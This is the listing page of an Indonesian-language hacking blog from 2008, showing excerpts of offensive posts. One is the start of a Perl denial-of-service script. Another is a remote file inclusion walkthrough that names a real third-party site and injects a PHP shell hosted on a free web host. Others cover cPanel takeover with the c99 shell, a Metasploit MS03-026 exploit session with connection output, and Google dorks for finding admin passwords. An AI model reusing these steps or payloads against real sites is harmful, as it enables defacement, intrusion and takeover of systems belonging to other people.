[+] Apakah bisa membuka “My Netwok Places”
uuppsss, ternyata pada langkah kali ini gue bisa membukanya… sehingga gue bisa melihat IP Address yang dipergunakan dan itu artinya gue bisa melakukan kegiatan2 berikutnya, perhatikan gambar dibawah ini :
Popularity: 1% [?]
hack | jadul | 
January 27, 2008 8:26 pm | 
Comments (2)
#!/usr/bin/perl
use IO::Socket;
if (@ARGV < 1)
{
print “\n”;
print ” \/[DoS for All Nassi <= 3.2 build 2260]===[v0.1]=====\\\n”;
print ” \| ___ ___ ___ ___ ___ \|\n”;
print ” \| N /s/ T N /s/ T N /s/ T N /s/ T N /s/ T \|\n”;
print ” \| — — — — — \|\n”;
print ” \| \|\n”;
print ” \| Tested on: Nasi 3.2 build 2260 www.gracebyte.com \|\n”;
print ” \| \|\n”;
print ” \| Usage: nasidos.pl [port] [-i] \|\n”;
print ” \| \|\n”; Read more »
Popularity: 1% [?]
hack | jadul | January 26, 2008 11:42 pm | Comments (1)
Ga seru kalo kita hanya bisa melakukan deface web target tanpa pernah mau tahu untuk menutup bug tersebut [ admin security yang baik harus berpikiran secara positif ], padahal untuk menutup bug pada web target bisa dilakukan dengan banyak cara dan kita bisa melakukannya secara manual, penulis akan mencoba memberikan step by step langkah melakukan patching manual secara sederhana tidak perlu berpikiran terlalu jauh karena dengan tehnik ini akan dapat menipu sang penyerang untuk bisa masuk ke dalam target, ok’s penulis coba ambil situs luar [ just for test admin ], kenapa penulis tidak mengambil contoh web target lokal ? jawabannya simpel dan sederhana ada dibenak anda , langsung aja jalankan paman google masukan string bug untuk : newspublish/, atau bila ga mau pusing masuk ke Server IRC cari chanel Underground Indonesia dan lakukan scanning terhadap target dengan string = !scan newspublish/include.php?path[docroot]=, penulis ambil contoh target : http://www.popolariudeur.pv.it/public/amministrazione/newspublish/include.php?path[docroot]=
kemudian seperti biasa lakukan penetrasi dengan phpshell yang kita tanam di situs gratisan, seperti dibawah ini, http://www.popolariudeur.pv.it/public/amministrazione/newspublish/include.php?path[docroot]= http://ernigalak.t35.com/mama.txt? Maka akan nampak seperti dibawah ini hasilnya : Read more »
Popularity: 1% [?]
hack | jadul | 11:22 pm | Comments (1)
sedikit info hack nih buat teman2
siapa tau bermanfaat. dicoba aja
iseng-iseng buat artikel tentang hacking cpanel dengan memakai script injeksi c99, coz sekedar refresh uda married susah Online [ 1 x seminggu , 2 jam ]. btw pertanyaannya apakah Cpanel itu ? yups Cpanel adalah merupakan pusat dari manajemen web site, CPanel atau istilah kerennya Control Panel adalah tempat dimana admin web untuk melakukan setting penuh dan control terhadap web yang akan dibuat atau istilahnya adalah CPANEL = Rumah yang masih kosong yang belum ada apa-apanya, nah disanalah nanti akan diisi perabotan-perabotan untuk melengkapi isi rumah tersebut, Cpanel sama juga seperti rumah, dan perabotannya bisa dikategorikan sebagai script web, script mail, script MySql, dll. Apakah CPANEL itu begitu penting dan berharga ? yups pertanyaan yang bagus jawabannya adalah IYA, karena bila CPANEL dalam suatu Web bisa dimasuki oleh para hacker maka dapat dipastikan bahwa web target berada dalam control sang hacker [ maaf saya bukan hacker J ] atau bila dilogikakan sama saja bila rumah kita berhasil di kuasain orang lain maka dipastikan orang lain tersebut bisa masuk kapan saja terhadap rumah kita. tapi apakah mudah rumah kita orang lain bisa masuk kerumah kita sedangkan rumah kita ada pengaman yaitu KUNCI, yups sama saja dengan CPANEL tidak semudah yang kita bayangkan karena untuk masuk ke area CPANEL membutuhkan kunci yaitu Username dan password, bila tidak maka anda dipastikan tidak akan bisa masuk ke dalam area CPANEL tersebut. Cukup jelas logika kita untuk berpikir , so sekarang kembali lagi ke pokok permasalahannya, penulis akan menerangkan pengambilan alih cpanel terhadap web target memakai kesalahan dari script logika pemograman dan kesalahan dari admin web tersebut, J Read more »
Popularity: 1% [?]
hack | jadul | 11:18 pm | Comments (11)
–[*] Starting the Metasploit Framework…
o 8 o o
8 8 8
ooYoYo. .oPY o. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P
8′ 8 8 8 oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8
8 8 8 8. 8 8 8 ‘Yb. 8 8 8 8 8 8 8
8 8 8 ` Yooo’ 8 `YooP8 `YooP’ 8YooP’ 8 `YooP’ 8 8
..:..:..:…..:::..::…..::…..:8…..:..:…..::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
+ — –=[ msfconsole v2.7 [157 exploits - 76 payloads]
msf > use msrpc_dcom_ms03_026
msf msrpc_dcom_ms03_026 > set PAYLOAD win32_bind
PAYLOAD -> win32_bind
msf msrpc_dcom_ms03_026(win32_bind) > set RHOST 172.16.0.5
RHOST -> 172.16.0.5
msf msrpc_dcom_ms03_026(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Sending request…
[*] Got connection from 172.16.0.3:3766 <-> 172.16.0.5:4444
Read more »
Popularity: 1% [?]
hack | jadul | 11:11 pm | Comments (2)
Googling hack
\†Intitle:\†ialah sintaks perintah untuk membatasi pencarian yang hanya menghasilkan judul yang mengandung informasi pada topik yang
dimaksud. Sebagai contoh pada pencarian, ?intitle:
password admin ? ( tanpa tanda kutip ). Pencarian akan mencari page yang mengandung kata ? password ? sebagai judulnya dengan prioritas utama ?admin? .
Jika pada pencarian terdapat dua query pencarian utama, digunakan sintaks allintitle: untuk pencarian secara lengkap. Sebagai contoh pada pencarian ?allintitle:admin mdb?. Maka pencarian akan dibatasi pada dua subjek utama judul yaitu ?admin? dan ?mdb?.
Read more »
Popularity: 1% [?]
hack | jadul | January 14, 2008 2:01 am | Comments (1)
Loading ...